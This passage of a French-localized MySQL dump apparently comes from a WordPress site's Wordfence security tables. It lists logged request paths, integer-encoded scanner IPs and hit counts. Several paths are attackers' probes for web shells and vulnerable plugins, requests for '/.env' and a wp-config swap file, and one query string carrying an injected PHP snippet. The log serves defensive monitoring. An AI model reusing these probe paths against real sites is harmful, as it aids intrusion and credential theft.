(0x5db212de588d326976912e4bbf7cdfc8, 1497056365, '/axt.php'),
(0x63ba6ec2977beabeb27449b68b5a9a89, 1497056370, '/nimas.php'),
(0x62df5504e051bab1fb10e1963a38440f, 1497056374, '/Dducfj.php'),
(0x86c3a4a3b4ccc1eef26d3add317512b0, 1497056377, '/azra.php'),
(0x5951b748ef8db663a702570dfee53a42, 1497056386, '/language.php'),
(0x1e6845b673e5ee0d9e31935810172bdd, 1497058823, '/wp-content/plugins/website-contact-form-with-file-upload/readme.txt'),
(0x9e4ab2e446f8f70b3492ed0867157863, 1497077254, '/wp-includes/class-wp-upgrade.php'),
(0x97096a6229693496f3562e77c562fb2d, 1497289915, '/indax.php'),
(0x5e002934a0a55d903b2300808c6b6ff7, 1497449513, '/popup-pomo.phpdel'),
(0x82595531d0b66647186dc1c1f210007c, 1497468346, '/wp-content/plugins/wp-db-ajax-made/news_parser.class.php'),
(0x7c7997ff4f2327a7303903fc1109e89b, 1497473371, '/wp-content/plugins/wp-db-ajax-made-1/wp-db-backup.php'),
(0x875ea6f8f0936c33433ae1386b3ef05c, 1497503902, '/wp-content/indes.php'),
(0x8deb321fb58b80c365436d998963a065, 1497512349, '/wp-content/uploads/51217766.php'),
(0x21996c201a0ece3dee2e3a8ae50b6ed3, 1497512352, '/wp-content/plugins/revslider/temp/update_extract/57758779.php'),
(0x68c3a190a246fc70455772e4366acdd6, 1497517316, '/temp1-1.php'),
(0x6828158a6f30fb3a5b669d48e3d4f0ee, 1497535511, '/wp-content/plugins/onten/onten.php'),
(0xcc0b9b0a265a5476301193f6db0b3511, 1497544378, '/cron.php'),
(0x86c0b6962b0ecfc47cea5422d7b5a416, 1497561377, '/wp-content/plugins/paypal-donation-button/paypal-donation-button.php'),
(0x4047f2160b2130694ecfdee5cf19cb5c, 1497565704, '/wp-admin/network/etc.php'),
(0xb66758d591f59f55c212650ab423d928, 1497581790, '/wp-content/plugins/wp_module-1/wp_msg.php'),
(0x25ba172f5cb563ab95bffe0335d67458, 1497581999, '/wp-content/plugins/wp-db-ajax-made/db-update.php'),
(0x2d986a34c110420eb0523ac0830e3b92, 1497590294, '/wp-content/plugins/paypal-donation-button/db.php'),
(0xa0493099cd481d0e775a5228a43855bb, 1497590332, '/wp-content/plugins/wp-db-ajax-made/db_info.class.php'),
(0x364a604481c83f1c37374e807f85f56a, 1497594586, '/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php'),
(0x0e65214685d70914a9f8920030487a92, 1497598922, '/wp-content/plugins/wp-db-ajax-made/user-info.php'),
(0x16ec9c9d7078550933cf23ff0f5dd82d, 1497603434, '/wp-content/plugins/wp-db-ajax-made/db_model.php'),
(0x484851880e7765db6406eb11a29cdaf1, 1497612213, '/wp-content/plugins/wp-db-ajax-made/slide-menues.php'),
(0xec0b15550dd059cc93164c7f4600f601, 1497630584, '/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php'),
(0x1647b576ec73c4c374b9afe99dea17b5, 1497642987, '/wp-content/themes/twentythirteen/system.php'),
(0xae14383f23b7fa771daf3f5c2f260331, 1497647735, '/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php'),
(0x0a10178deb2eb8755e1c84c95981bc0b, 1497659627, '/models.php'),
(0xe67bd70c4d0d73d8ed08b3236c20b0b6, 1497703045, '/wp-content/themes/twentyeleven/content-wrapper.php'),
(0x945d0ec33836559657c982a2145496fc, 1497716833, '/wp-content/plugins/wp-db-ajax-made/pdo.inc.php'),
(0x953e637f02e507064c534586cb91f339, 1497716951, '/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php'),
(0x428e70e93005f1099d43b89a23fa1a12, 1497734838, '/framework.php'),
(0x22896a3a0170eb8f121d210afec325a7, 1497775936, '/wp-content/plugins/wp-db-ajax-made/rss_feeder.class.php'),
(0xf38a6c2dbaddeb0038ccfde1b59f0495, 1497784963, '/wp-forms-ajax.php'),
(0xfda43f11cc32ab907201c4bd8db06c00, 1497799079, '/wp-content/plugins/three-column-screen-layout/db.php'),
(0x1d3c29c20c278b2eea89a8dcfdb3cdd6, 1497800174, '/content-wrapper.php'),
(0x93ed7818515aa1385d0d3513fed01e70, 1497808633, '/wp-form-ajax.php'),
(0x93df865712d0550ca495a4aad438cc30, 1497838499, '/wp-content/plugins/easyrotator-for-wordpress/b.php'),
(0x813fd5386c0d7fd22fcb9980ac9eef28, 1497909941, '/wp-content/plugins/console_contact_form/upload_file.php?files'),
(0xf5141fb1f4c61489a2841515547454ba, 1497986486, '/wp-content/uploads/temp.php'),
(0x4c5062265a79b71b0466a92f130598c7, 1497987191, '/wp-content/plugins/temp.php'),
(0xf764edd4003e9fb9742aeb2301116965, 1497987551, '/wp-content/uploads/yt.php'),
(0xce22528875c06e5e48708ef50069f849, 1497987860, '/wp-inde.php'),
(0x1c61a309770649eaf5be41352e59de5d, 1497988728, '/images/yt.php'),
(0xd79a20b9776fe29c7e685f3b4ed5d358, 1497989217, '/modules/modules/temp.php'),
(0xb7880d9a768480d1e8526f598a895893, 1497989464, '/images/temp.php'),
(0xccc22c3dde4076ab420f3a76cb85e04b, 1497989725, '/wp-includes/css/temp.php'),
(0xecbb53d53dcfc12bb9af8d588d9c6a42, 1497989791, '/wp-content/uploads/2017/05/yt.php'),
(0x9ddb868b5e1ec85bf55d71750c300e2d, 1498023591, '/wp-content/plugins/Newspaper/readme.txt'),
(0x9c9d48ca1cebd29452555c59790ca00e, 1498146910, '/wp-content/uploads/wpcf7_captcha/1299398436.png'),
(0x977ef3045a90e7e4e006fcd94937c92e, 1498207783, '/wp-content/plugins/wp-db-ajax-made/user-info.php.suspected'),
(0x50e38f567d6d0260927bc13a3750afac, 1498235723, '/wp-forms-ajax.php.suspected'),
(0x77660c72b8cb0b9dd6c1bb6d9c07c35d, 1498236018, '/logo_img.php.suspected'),
(0x8d9fd9159a9b4e4c469c4d76d137e91e, 1498240292, '/wp-content/plugins/wp-db-ajax-made/db_info.class.php.suspected'),
(0xdbf276be9272be1a0d0b59654f8d3b9e, 1498253926, '/changelog.php'),
(0xdd5fdaeedeb6231be9018a064d2ee481, 1498283815, '/wp-content/themes/evolution/news_parser.class.php.suspected'),
(0xe84c54f676c3302fb4596106c2c81d7c, 1498293517, '/themes/popup-pomo.php'),
(0x9130bd37649e89bc2d18d5667db9dcc1, 1498297316, '/blogs/wp-admin/setup-config.php'),
(0x71b9eccc90aade532d9377c5b8628253, 1498297316, '/new/wp-admin/setup-config.php'),
(0xab388bd8c5bf983d9ae02ab51276484c, 1498297317, '/beta/wp-admin/setup-config.php'),
(0xb7900078617fd0979e14e0d04b6ddd0a, 1498306847, '/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected'),
(0x5a0962af1c33280cd7dd110820f4e4fc, 1498311277, '/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected'),
(0x3d60f43a2f20b421c24574617f3cfa3c, 1498317058, '/hello-world/#respond'),
(0xf0bcab8b60cf4e8ac86cf08b1072a710, 1498320951, '/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected'),
(0x33d60149fa511ee2658ded434ebdf4b9, 1498324473, '/wp-content/themes/sketch/edqvbo.php'),
(0x56d2d07a3d0b498c1598485cf9fa71e5, 1498329006, '/maint/popup-pomo.php'),
(0x43f9ac692b6e98c442ec4249dd41cf40, 1498329670, '/look.php.suspected'),
(0xcfd33441ea444d2188f6eec77a6f08f9, 1498338015, '/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected'),
(0x3b1fd4cc53488c854e3cdc9098f3a2c1, 1498342363, '/wp-form-ajax.php.suspected'),
(0x6b88f5a8c697ebf573a8c7ccf0168d82, 1498365325, '/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected'),
(0x31da23ddbf50e3f322a3994a8dba15b3, 1498391788, '/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected'),
(0x5ba2b07b8657a9485021473ee62536e3, 1498391804, '/wp-content/themes/sketch/404.php.suspected'),
(0xe0d03f6f23648ec6644a391a5a9309e9, 1498391989, '/wp-content/themes/evolution/content-wrapper.php'),
(0xe44cdb31bebdb49024111bceaf94e7e7, 1498405486, '/wp-content/themes/twentyeleven/wp-ajax.php'),
(0xb1352183892960b073c9cc04d4f832b6, 1498445498, '/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php.suspected'),
(0xc37fc4e1fb49bf3ad48811b50437e188, 1498451728, '/wp-includes/text/diff/engine/engine.php'),
(0x290095e1acaf1d658183e2d5337750c0, 1498452161, '/wp-includes/class.wp-tmps.php'),
(0xa4309ff6cdbc7cb4c2f2776cfb45bdb8, 1498629831, '/shop'),
(0xc7cd21a8009d90470f1bfbc5d8d09c8c, 1498635032, '/wp-content/upgrade/bb.php'),
(0x4e7af99855494c91af6c91ed20a86f44, 1498635104, '/wp-content/uploads/bb.php'),
(0x9e5afa8d46c60d0e732c2dfde24ff2c4, 1498638177, '/indes.php?15=printmd532423;exit;'),
(0xc0e765112b1a4241a3e58b322d39e01a, 1498881454, '/wp-content/uploads/wpcf7_captcha/1993469065.png'),
(0x1c8147d1c4ccb03a661cfe75f338a818, 1498973143, '/wp-content/plugins/fAaWBH.php'),
(0x6e433a22385961be6cbd332baeff8c9a, 1499072012, '/wp-content/plugins/easyrotator-for-wordpress/c.php'),
(0xd3ef13377a6e3b69175c96d6a447d204, 1499072173, '/wp-content/plugins/easyrotator-for-wordpress/one.php'),
(0x31f6ac6a8b378af503ad826b050a2a7c, 1499076701, '/wp-includes/class.wp.php?ok'),
(0x5924483009bd0c67e0d46275a0d389ac, 1499088986, '/wp-content/plugins/easyrotator-for-wordpress/cache.php'),
(0x7d946d336cf3d10dac6ebb3a496496c5, 1499089511, '/.env'),
(0xe73d5e794d91aa5f70012b7d0f6cc53c, 1499168708, '/wp-content/plugins/prettyphoto/pretyphoto.php'),
(0x756feb86d5025dc7806979a818303049, 1499478737, '/wp-content/plugins/wp-statistics/readme.txt'),
(0x58d155b1fabd1abe91252cd1d7759df3, 1499690263, '/wp-admin/uploader.php'),
(0xc6c8e150622437a0ccf7e366fcef274a, 1499714556, '/.wp-config.php.swp'),
(0xd244c4bb36a02dc8010f3639539e40d1, 1499762619, '/wp-admin/includes/lock46.php'),
(0x09b79677728cb0689f680889c3760771, 1499849669, '/wp-content/uploads/wpcf7_captcha/548452661.png'),
(0x644342e19819f2fd3534424eabf5e8e0, 1499891992, '/forum.php'),
(0x37e28ecceb359c3b37d6c44ba106e2a8, 1500012313, '/wp-content/plugins/wp-symposium/server/php/zTisCnHaSLBeVo.php'),
(0x2743772e92160359f47d782e0bf4e83e, 1500014056, '/wp-includes/js/tinymce/plugins/wpview/diff.php'),
(0xf6db6419258be781a02a10113dcdcd96, 1500086850, '/press/wp-admin/setup-config.php'),
(0xe9ddefa55073b7c72064e6f31d565217, 1500086850, '/main/wp-admin/setup-config.php'),
(0x3f8e4be7b8e809474df16629f5beaf58, 1500086851, '/protal/wp-admin/setup-config.php'),
(0x3d7e656a232257f783eb419dbc21ffc5, 1500086851, '/cms/wp-admin/setup-config.php'),
(0xae1d1ff3cb26fb3d687243adcc58d24d, 1500198487, '/wp-content/plugins/uploadify/readme.txt'),
(0x63a0a2279fdf9fe14f284cb462c832af, 1500203704, '/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php.suspected'),
(0x5ca06b70161f1debf3d06bca4e2e41d0, 1500216339, '/wp-content/themes/avada/content-wrapper.php'),
(0x86af645e22987b0c38e4a2987c656964, 1500352103, '/mxl.php'),
(0x10aa065a50a1088b8de8a6356916f88b, 1500435655, '/wp-content/uploads/2015/05/upl.php'),
(0x543ccb32963e6f80f6836685e9c96bbf, 1505954328, '/coghykqnv.html'),
(0x79c4f8c91f992e98cc357b3833beaf14, 1507160322, '/tskwrguygfsu.html'),
(0xbb2d7f20a0ff18c8736a677f47e1d870, 1508391813, '/wzbxfqya.html'),
(0x0142bcc8d98f8656991d18cd25bbc05d, 1511855406, '/khciysmhfxophc.html'),
(0x8b1b6a0f4da13bb62b78915105b6d3ab, 1512825925, '/bkjkuqbb.html'),
(0xa908270fa78908332fac3ca281c05a8b, 1513794073, '/siegsjmluleg.html'),
(0xb978b4e2c033183b1d6259f8c38be097, 1517829470, '/cyczwmgt.html'),
(0xe639f0fa7e4406c92843202632693896, 1518707154, '/pavrdlvdjfjn.html'),
(0x78b56be5c13606805af10e2a2c841afa, 1519430236, '/contact-2/'),
(0x36b79ef718eaef3f5d81dfef1d92b1c1, 1519567078, '/mpiijtgh.html'),
(0x642afafeeaa0204bc10aae6127356dea, 1523302140, '/bpxbssfzcep.html'),
(0x2aa080f9a45502cefffacea256df37c2, 1524262696, '/eszjluxfwv.html'),
(0xafa0280ebec427ce5dee00afec4bfe4c, 1525273858, '/deadwmiuhcbmro.html'),
(0xc8f527ad48e05e2d4b7385bc5b2846ee, 1526154955, '/cdepnyydefyywzod.html'),
(0xe0951ae72a50e98dfc70e68b34318314, 1527751777, '/bitrix/admin/?lang=en'),
(0xb0c619f09afa807b5760a5a96efde9ed, 1527751777, '/admin/login.php'),
(0xd1537bd0b66a4289001629ac2e06e742, 1527751778, '/admin/'),
(0x00d6b15ae97d06f77c96c6c8e0f46857, 1527751779, '/user/'),
(0x309ec8bc2bee378f7c8252f39489c4f6, 1529304968, '/rwnokycpbjhrm.html'),
(0xf327ce7b21e80efbc0b345c9d0ed7df7, 1530465924, '/cysnhymxivwxsu.html'),
(0x50b73cf214d9d061cd1fa71e38cfd2ac, 1536685036, '/sutzvmzdesfovj.html'),
(0x51f5e9c8605edf610718868353baa132, 1541298627, '/jtndmlcpuygmpn.html'),
(0x39ae371de0f6e64deec98267cd92df1f, 1542638268, '/koscnkklpz.html'),
(0x8bb9c6d0ad690f3ac214a5b35dddd5dd, 1544558112, '/ghhgzhokpqhdmklo.html'),
(0x696eafa069bae0937fcdfbf169d5a4b3, 1545838990, '/qdrheutszzniqrci.html'),
(0x0d21b56643cf496fa8b5454cb24bb66b, 1547159151, '/wyelofyg.html'),
(0x2f5b59a2f88bae6f4511d9c46972fd06, 1548458535, '/pwnxqppij.html'),
(0x1f25347bc2c48157e60bc1b60c491f1c, 1549845286, '/hwyluhdsmmylayin.html'),
(0x0019d5e94cd042de627a348a2a4db162, 1551242399, '/xaururxuhszpmjt.html');

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfReverseCache`
--

CREATE TABLE `www2_wfReverseCache` (
  `IP` int(10) UNSIGNED NOT NULL,
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfScanners`
--

CREATE TABLE `www2_wfScanners` (
  `eMin` int(10) UNSIGNED NOT NULL,
  `IP` int(10) UNSIGNED NOT NULL,
  `hits` smallint(5) UNSIGNED NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Déchargement des données de la table `www2_wfScanners`
--

INSERT INTO `www2_wfScanners` (`eMin`, `IP`, `hits`) VALUES
(24910256, 1374769563, 10),
(24910100, 3587417960, 3),
(24910006, 3112277173, 1),
(24909865, 1539836988, 1),
(24909722, 1123631646, 1),
(24909696, 3112277173, 1),
(24909666, 1374841142, 12),
(24909627, 2995861269, 1),
(24909459, 632865533, 10),
(24908891, 3639891306, 1),
(24908798, 1538510707, 1),
(24908795, 1374841142, 12),
(24908780, 3112277173, 1),
(24908592, 1374769563, 10),
(24908445, 2187902172, 1),
(24908203, 1374841142, 12),
(24908143, 1374841142, 12),
(24908064, 3112277173, 1),
(24908052, 1538358342, 1),
(24907999, 1374769563, 10),
(24907770, 3639891306, 1),
(24907482, 1838094426, 10),
(24907480, 1838094426, 10),
(24907435, 1374841142, 9),
(24907434, 1374841142, 3),
(24907354, 1357699146, 1),
(24907237, 1374841142, 12),
(24907047, 1374841142, 12),
(24906988, 1374769563, 10),
(24906907, 1464066970, 10),
(24906799, 3256644604, 1),
(24906790, 3256644604, 1),
(24906786, 3256644604, 1),
(24906783, 3256644604, 1),
(24906649, 3256644604, 1),
(24906574, 2953337008, 2),
(24906568, 3256644604, 1),
(24906567, 1374841142, 12),
(24906564, 3256644604, 1),
(24906507, 3256644604, 2),
(24906476, 1123631313, 1),
(24906459, 3256644604, 1),
(24906418, 3256644604, 1),
(24906384, 3256644604, 1),
(24906366, 3256644604, 2),
(24906316, 3256644604, 1),
(24906290, 3256644604, 1),
(24906265, 3256644604, 1),
(24906219, 3256644604, 1),
(24906187, 3256644604, 1),
(24906186, 3256644604, 1),
(24906186, 1247482290, 5),
(24906180, 1247482290, 1),
(24906179, 1247482290, 9),
(24906178, 1247482290, 7),
(24906177, 1247482290, 12),
(24906176, 1247482290, 6),
(24906175, 1247482290, 8),
(24906174, 1247482290, 6),
(24906173, 1247482290, 5),
(24906172, 1247482290, 4),
(24906171, 1247482290, 5),
(24906170, 1247482290, 5),
(24906169, 1247482290, 3),
(24906168, 1247482290, 5),
(24906167, 1247482290, 4),
(24906166, 1247482290, 3),
(24906165, 1247482290, 3),
(24906164, 1247482290, 7),
(24906163, 1247482290, 7),
(24906162, 1247482290, 4),
(24906161, 1247482290, 7),
(24906160, 1247482290, 6),
(24906159, 1247482290, 4),
(24906158, 1247482290, 4),
(24906157, 1247482290, 3),
(24906156, 1247482290, 7),
(24906155, 1247482290, 5),
(24906154, 1247482290, 5),
(24906153, 1247482290, 3),
(24906152, 1247482290, 2),
(24906151, 1247482290, 4),
(24906150, 1247482290, 3),
(24906149, 1247482290, 3),
(24906148, 3256644604, 1),
(24906148, 1247482290, 3),
(24906147, 1247482290, 4),
(24906146, 1247482290, 3),
(24906145, 1247482290, 5),
(24906144, 1247482290, 6),
(24906143, 1247482290, 5),
(24906136, 3256644604, 1),
(24906081, 3256644604, 1),
(24906073, 3256644604, 1),
(24906008, 3256644604, 1),
(24905983, 3256644604, 1),
(24905965, 3256644604, 1),
(24905957, 1374841142, 12),
(24905917, 3256644604, 1),
(24905856, 1833311020, 1),
(24905843, 3256644604, 1),
(24905842, 3256644604, 1),
(24905737, 3256644604, 1),
(24905635, 3256644604, 1),
(24905589, 3256644604, 1),
(24905515, 3256644604, 1),
(24905493, 3256644604, 1),
(24905472, 3259896531, 1),
(24905459, 3256644604, 1),
(24905448, 1796538632, 1),
(24905406, 3256644604, 1),
(24905152, 1837924479, 10),
(24905107, 2916143010, 2),
(24905061, 1837931087, 1),
(24904992, 3639891306, 1),
(24895871, 3112277173, 1),
(24895651, 1374841142, 12),
(24895636, 2644818889, 1),
(24895616, 1539837611, 2),
(24904538, 1375112542, 10),
(24904468, 1834596154, 1),
(24904448, 1375112542, 10),
(24904443, 1375112542, 10),
(24904431, 3281714082, 1),
(24904234, 3587417960, 3),
(24904154, 1554035825, 1),
(24904135, 2953337008, 1),
(24904122, 3112277173, 1),
(24904094, 3567661094, 1),
(24903838, 1538628281, 12),
(24895473, 2989639598, 1),
(24895394, 1375112542, 10),
(24903759, 2989643491, 1),
(24895382, 1755877124, 1),
(24903336, 2945073626, 1),
(24903274, 3233510666, 1),
(24910792, 3112277173, 1),
(24911005, 1838104422, 10),
(24903013, 3024883593, 1),
(24903008, 3112277173, 1),
(24902957, 2297635928, 3),
(24902914, 1123635120, 1),
(24902898, 1834517617, 1),
(24902888, 2745985804, 1),
(24902797, 1374841142, 1),
(24902727, 1375112542, 10),
(24902681, 1375112542, 10),
(24902670, 1837474429, 1),
(24902669, 1837474429, 1),
(24902652, 1375112542, 10),
(24902228, 1123635091, 1),
(24902164, 2509961939, 1),
(24901576, 3112277173, 1),
(24901554, 3635199342, 24),
(24901553, 3635199342, 7),
(24901476, 3256644604, 1),
(24901421, 3256644604, 1),
(24901394, 1375112542, 10),
(24901390, 3256644604, 1),
(24901359, 3256644604, 1),
(24901338, 1370049247, 10),
(24901257, 3256644604, 1),
(24901191, 1123631302, 1),
(24901187, 3256644604, 1),
(24901123, 2745985804, 1),
(24901117, 3273261686, 10),
(24901112, 3273261686, 10),
(24901061, 3256644604, 1),
(24901036, 3256644604, 1),
(24901012, 3256644604, 1),
(24900984, 3256644604, 1),
(24900935, 3256644604, 1),
(24900688, 2499535434, 1),
(24900658, 1374838938, 2),
(24900657, 1374838938, 1),
(24900299, 1355389698, 1),
(24900176, 1538628086, 1),
(24900161, 1375112542, 10),
(24900036, 2961112076, 1),
(24899941, 1374841142, 12),
(24899738, 3112277173, 1),
(24899493, 3250575437, 1),
(24899135, 3112277173, 1),
(24898787, 1123633555, 1),
(24898766, 2499535434, 1),
(24898667, 1374841142, 6),
(24898661, 1374841142, 6),
(24898583, 1374841142, 12),
(24895304, 1837860862, 4),
(24894657, 1123632467, 1),
(24894523, 1374841142, 12),
(24894230, 1375112542, 10),
(24894216, 1834516790, 1),
(24894170, 1538699446, 1),
(24894164, 1375112542, 10),
(24911681, 1796538632, 1),
(24898491, 1538308269, 1),
(24898466, 3267064321, 1),
(24898367, 3112277173, 1),
(24897995, 3112277173, 1),
(24897855, 3281714082, 1),
(24897545, 2499535434, 1),
(24897376, 1374841142, 12),
(24897268, 1837482126, 1),
(24897240, 3112277173, 1),
(24897194, 1374841142, 4),
(24897173, 3281714082, 1),
(24897118, 1374841142, 12),
(24897117, 1837274001, 1),
(24881297, 1837165719, 10),
(24880718, 1837522582, 1),
(24880394, 2499535434, 1),
(24880385, 2960257375, 1),
(24880367, 2960257375, 1),
(24880346, 2960257375, 1),
(24880345, 2960257375, 1),
(24880342, 2960257375, 1),
(24880337, 2960257375, 1),
(24880333, 2960257375, 1),
(24880305, 2960257375, 1),
(24880295, 2960257375, 1),
(24880282, 2960257375, 1),
(24880277, 2960257375, 1),
(24880271, 2960257375, 1),
(24880264, 2960257375, 1),
(24880251, 2960257375, 1),
(24880238, 2960257375, 1),
(24880207, 2960257375, 1),
(24880194, 2960257375, 1),
(24880189, 2960257375, 1),
(24880178, 2960257375, 1),
(24880164, 2960257375, 1),
(24880163, 2960257375, 1),
(24880136, 2960259765, 1),
(24880127, 2960259765, 1),
(24880110, 2960259765, 1),
(24880089, 2960259765, 1),
(24880082, 2960259765, 1),
(24880055, 2960259765, 1),
(24880045, 693628318, 1),
(24880032, 1837165719, 10),
(24880027, 2960259765, 1),
(24879856, 2960259765, 1),
(24894137, 1355389698, 1),
(24894050, 1355294142, 1),
(24893971, 1837906296, 1),
(24893853, 1834495119, 1),
(24892994, 1375112542, 10),
(24892848, 1375112542, 10),
(24891878, 3233510666, 2),
(24891564, 1375112542, 10),
(24891563, 1538461206, 1),
(24891528, 2297635928, 3),
(24891509, 1374841142, 12),
(24891449, 1570674703, 1),
(24891313, 1123631646, 1),
(24891065, 1538506743, 1),
(24891054, 635303436, 1),
(24890816, 2745971880, 1),
(24890294, 2509962920, 1),
(24890206, 3323226906, 1),
(24890198, 2499535434, 1),
(24890187, 1374824443, 1),
(24889919, 3639891306, 1),
(24889880, 3287437334, 1),
(24889685, 1375112542, 7),
(24889684, 1375112542, 3),
(24889577, 1538649748, 3),
(24889501, 3234106972, 2),
(24889029, 2499535434, 1),
(24888885, 3163187461, 1),
(24888772, 1374841142, 12),
(24888605, 1837857107, 1),
(24888420, 1837953980, 10),
(24888205, 2995859706, 10),
(24888172, 3267064321, 1),
(24887659, 1539836988, 1),
(24887193, 1837165719, 6),
(24887192, 1837165719, 4),
(24887001, 1837382274, 1),
(24886860, 1837165719, 10),
(24886391, 1123632437, 1),
(24886195, 1539836988, 1),
(24885984, 1123632438, 1),
(24885979, 1374841142, 4),
(24885974, 1374841142, 2),
(24885931, 1538628250, 2),
(24885819, 1837165719, 10),
(24885589, 1374841142, 12),
(24885446, 2661914122, 1),
(24885399, 2783008832, 1),
(24884943, 1837858581, 10),
(24884720, 1338304744, 1),
(24883905, 1837933865, 10),
(24882313, 1834499396, 1),
(24882387, 1123631313, 1),
(24879924, 2960259765, 1),
(24882399, 2655379749, 1),
(24896060, 3112277173, 1),
(24896407, 3112277173, 1),
(24896526, 3252386809, 1),
(24883904, 2297635928, 1),
(24883903, 2297635928, 1),
(24883902, 2297635928, 1),
(24883749, 3639891306, 1),
(24883608, 632890059, 10),
(24881386, 1837165719, 10),
(24896528, 3252386809, 1),
(24881566, 1796538632, 1),
(24881653, 2499535434, 1),
(24883576, 1538649748, 3),
(24881691, 1539836988, 1),
(24883574, 96767447, 1),
(24883561, 1837165719, 10),
(24883516, 1837165719, 10),
(24896686, 3112277173, 1),
(24896820, 2366145591, 1),
(24879930, 2960259765, 1),
(24882262, 1439284665, 1),
(24883271, 3112255039, 5),
(24883270, 3112255039, 9),
(24883070, 2499535434, 1),
(24896965, 3112277173, 1),
(24879880, 2960259765, 1),
(24883044, 2996488216, 1),
(24879883, 2960259765, 1),
(24879910, 2960259765, 1),
(24879951, 2960259765, 1),
(24879989, 2960259765, 1),
(24879995, 2960259765, 1),
(24882910, 1374841142, 12),
(24896887, 1374841142, 12),
(24896922, 1324940073, 1),
(24882854, 1837165719, 10),
(24882794, 1568498494, 29),
(24896926, 2297635928, 1),
(24880009, 2960259765, 1),
(24880021, 2960259765, 1),
(24880022, 2960259765, 1),
(24896941, 2644818889, 1),
(24896942, 1837372382, 1),
(24880023, 2960259765, 2),
(24882793, 1568498494, 2),
(24882763, 1837165719, 8),
(24882762, 1837165719, 2),
(24911728, 1374769563, 10),
(24911764, 1374841142, 12),
(24912127, 1539836988, 1),
(24912452, 783526296, 10),
(24912792, 2513049709, 11),
(24912793, 2513049709, 6),
(24912864, 1123632438, 1),
(24913187, 3639891306, 1),
(24913305, 1374841142, 9),
(24913306, 1374841142, 3),
(24913516, 3657086074, 1),
(24913593, 1347558503, 1),
(24913712, 1439270026, 1),
(24913838, 3154455105, 10),
(24913926, 2763076217, 1),
(24914083, 3233510666, 2),
(24914293, 1538461267, 2),
(24914318, 1374769563, 10),
(24914411, 1123632437, 1),
(24914654, 783531305, 10),
(24914860, 1123633622, 1),
(24914947, 2997442321, 1),
(24915163, 1374841142, 12),
(24915212, 1374769563, 10),
(24915235, 1374841142, 12),
(24915351, 2509961901, 1),
(24915401, 1053115180, 1),
(24915488, 2783008832, 1),
(24915592, 632871405, 10),
(24915766, 783517035, 10),
(24916104, 1374769563, 2),
(24916167, 1123631313, 1),
(24916400, 3639891306, 1),
(24916644, 1374769563, 10),
(24916779, 1374841142, 6),
(24916780, 1374841142, 6),
(24916846, 1375132497, 1),
(24917179, 1374841142, 12),
(24917192, 3024883467, 1),
(24917311, 1342987974, 1),
(24917362, 1796538632, 1),
(24917423, 1374841142, 12),
(24917425, 1374769563, 10),
(24917563, 1374841142, 12),
(24917787, 1538452237, 12),
(24918203, 86661764, 1),
(24918259, 3024883478, 1),
(24918622, 783539426, 10),
(24918690, 2499535434, 1),
(24918896, 1374841142, 12),
(24918898, 1374769563, 6),
(24918899, 1374769563, 4),
(24918910, 1374769563, 10),
(24918973, 1374841142, 3),
(24918974, 1374841142, 9),
(24919275, 1123633629, 1),
(24919525, 1374769563, 10),
(24919734, 1323276251, 1),
(24919789, 3561526078, 1),
(24919844, 2366145567, 1),
(24920000, 1439270754, 1),
(24920169, 2499535434, 1),
(24920463, 1374841142, 12),
(24920999, 632825899, 9),
(24921011, 1374841142, 12),
(24921097, 1374841142, 12),
(24921150, 3154448177, 10),
(24921159, 3154448177, 10),
(24921164, 3154448177, 10),
(24921344, 1374841142, 12),
(24921573, 3039911297, 1),
(24921781, 1837876689, 1),
(24921790, 1374769563, 10),
(24922336, 2366148113, 1),
(24922691, 1374769563, 7),
(24922692, 1374769563, 3),
(24922844, 1374769563, 10),
(24923014, 1952643501, 1),
(24923117, 1374841142, 12),
(24923544, 1123631732, 1),
(24923969, 3267064321, 1),
(24924131, 2499535434, 1),
(24924171, 1538458305, 1),
(24924273, 1538512707, 1),
(24924299, 3166481419, 3),
(24924383, 2644818889, 1),
(24924489, 1123633622, 1),
(24924536, 2745986199, 1),
(24924632, 1374769563, 10),
(24924647, 1374843811, 1),
(24924697, 1538567300, 1),
(24924760, 1374841142, 12),
(24924834, 3161848526, 1),
(24925288, 3652617308, 1),
(24925603, 1539836988, 1),
(24925659, 2499535434, 1),
(24925776, 3154495934, 10),
(24926144, 1374769563, 10),
(24926265, 1374841142, 12),
(24926544, 3192595645, 1),
(24926683, 1123633555, 1),
(24927046, 3639891306, 1),
(24927094, 1374769563, 10),
(24927451, 1374841142, 12),
(24927461, 1375117429, 1),
(24927517, 1374769563, 10),
(24928274, 1374769563, 6),
(24928275, 1374769563, 4),
(24928343, 1374841142, 12),
(24928403, 1374841142, 12),
(24928443, 3639891306, 1),
(24928520, 1374769563, 3),
(24928542, 1539836988, 2),
(24928587, 1374769563, 4),
(24928588, 1374769563, 6),
(24929113, 1540278443, 10),
(24929408, 1123633950, 1),
(24929499, 2499535434, 1),
(24929622, 3024883600, 1),
(24929679, 1374769563, 10),
(24929750, 1374769563, 7),
(24929751, 1374769563, 3),
(24929825, 1374769563, 10),
(24930047, 1834609551, 1),
(24930202, 3587417960, 3),
(24930494, 2366145567, 1),
(24930795, 3098069115, 1),
(24930799, 3098069115, 1),
(24930824, 657097413, 1),
(24930845, 3281714129, 1),
(24931146, 1834609551, 1),
(24931157, 1374769563, 10),
(24931267, 2809283056, 1),
(24931283, 1123632542, 1),
(24931325, 1539836988, 1),
(24931556, 1374841142, 12),
(24931653, 1053970098, 1),
(24931874, 1374769563, 10),
(24932126, 1082769246, 1),
(24932140, 2994513029, 1),
(24932142, 2994513029, 1),
(24932178, 3559911201, 1),
(24932573, 1538656104, 12),
(24932737, 2509950143, 1),
(24932876, 1374769563, 10),
(24932879, 1546285845, 1),
(24933036, 3373404845, 3),
(24933303, 1374769563, 10),
